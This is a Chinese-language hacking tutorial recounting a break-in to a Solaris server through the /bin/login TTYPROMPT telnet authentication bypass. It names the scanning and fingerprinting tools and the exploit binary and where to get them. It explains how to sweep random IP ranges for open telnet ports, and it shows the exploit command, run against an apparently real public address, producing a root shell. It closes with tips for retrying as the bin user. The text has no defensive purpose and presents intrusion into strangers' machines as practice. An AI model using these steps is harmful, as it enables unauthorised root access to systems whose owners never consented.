記一次成功入侵Solaris伺服器(sun)

一,入侵準備

最近微軟的漏洞可就多了,所以在網上流傳著各種各樣的入侵Windows的文章,早就聽說了Solaris系統也出來漏洞,決定拿這個要練習一下,隨便熟悉一個這個系統. 在Solaris系統2.6 2.7和2.8的/bin/login存在一個可以通過環境變數TTYPROMPT繞過驗證的漏洞,這個漏洞其實早在2002年10月就發佈了,在時間上還算是很新,在網上也應該能找到沒有打補丁的機子,但是如果已經安裝了 “System V系統Login遠程緩衝區溢出漏洞”補丁的系統不受這個漏洞的影響,所以對於這個系統成功率也不是很高.

二,所需工具

1, SCANNER.EXE,這個大家是很熟悉的了,我們這裡是用它來尋找網路上開了23端口telnet服務的主機.

2, 天眼1.0.5.exe,這個是被動式系統識別,域名解析,地理位置查詢,可以用來探測系統的類型.

3, WinPcap_2_3.exe, 由於天眼1.0.5構建在LibPcap之上，故在運行本軟體之前必須安裝Winpcap驅動.

(上述三個工具可以去安全焦點http://www.xfouse.net 下載)

4,sun.exe,紅客聯盟的Lion寫的Win版本的工具程式,可以去http://www.cnhonker.com 下載,解壓後發現有兩個文件,sun.exe和CYGWIN1.DLL,在使用的時候請把兩者放在同一目錄下sun.exe才可使用.

三,工具實例

我們首先要做的就是尋找開了23端口的Solaris主機.雖然這樣的機子在網上也有不少,可是畢竟不想Windows一樣到處都是.

安裝WinPcap_2_3.exe驅動,以便讓天眼能夠工作,安裝完畢就可以打開天眼了,在功能表欄上點擊 “操作”,選擇 “開始”就可以讓它工作了.

然後我們打開SCANNER.EXE,填入我們要掃描的IP地址,在 “掃描選項”的 “端口範圍”寫上23到23,這樣就可以掃描IP段內所有開放23端口的主機了.

等掃描結束以後,我們再看看以前打開的天眼,怎麼樣?找到了很多的Solaris主機了吧!(如果沒有發現Solaris主機,那麼在SCANNER.EXE另外換一個IP段試一試,應該能找到一些的).

好了,主機已經找到了,接下來就是利用這個漏洞入侵了 ,將下載的sunos-telnet.zip解壓後發現有兩個文件,sun.exe和CYGWIN1.DLL,由於sun.exe需要CYGWIN1.DLL動態數據庫的支援,所以在使用的時候請把兩者放在同一目錄下.

還是讓我們來看看sun.exe的用法,開一個CMD,進入改文件的目錄,在CMD下輸入:

F:\HACK>sun.exe

======================

Solaris 5.6 7 8 telnetd Remote exploit

Code by lion, Welcome to HUC website http://www.cnhonker.com

usage: sun [-u user] [-p port] <-h host>

-u: login username (default: bin), try "root"

-p: port to use (default: 23)

看懂了吧!假設我們找到一個IP為202.193.*.80的Solaris主機,那麼我們就輸入”

sun.exe –u root –p 23 –h 202.193.*.80

我們也可以直接的輸入:

sun.exe –h 202.193.*.80

這時就使用默認的值,用戶名為bin,端口為23.

現在我們就拿一台我們剛剛找到的Solaris主機來做測試了,由於攻擊的端口就是23,所以這個-p我們就不要輸入了,在CMD下輸入:

Microsoft Windows XP [版本 5.1.2600]

(C) 版權所有 1985-2001 Microsoft Corp. D:\Documents and Settings\linyun>f:

F:\>cd hack

F:\HACK>sun.exe -u root -h 210.220.131.236

==========================

Solaris 5.6 7 8 telnetd Remote exploite

Code by lion.Welcome to HUC website http://www.cnhonker.com

send to target:

root c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c

c c c c c c c c c c c c c c c c c c c c c c c c c c

當出現了#這個符號的時候,這就說明瞭我們已經取得了管理員的許可權了。

,我們可以看看自己是不是真的取得管理員的許可權了，在CMD中輸入who am i就可以看見我們的IP地址了!

注意：如果在攻擊的時候出現connect: Connection refused；connect: Connection aborted; connect: Connection reset by peer這樣的資訊，或者等了很久還沒有反應，則表示攻擊失敗了，最大的可能是這臺Slaris不允許root用戶遠程登陸，我們可以用一般的系統用戶bin溢出試一試

(e129)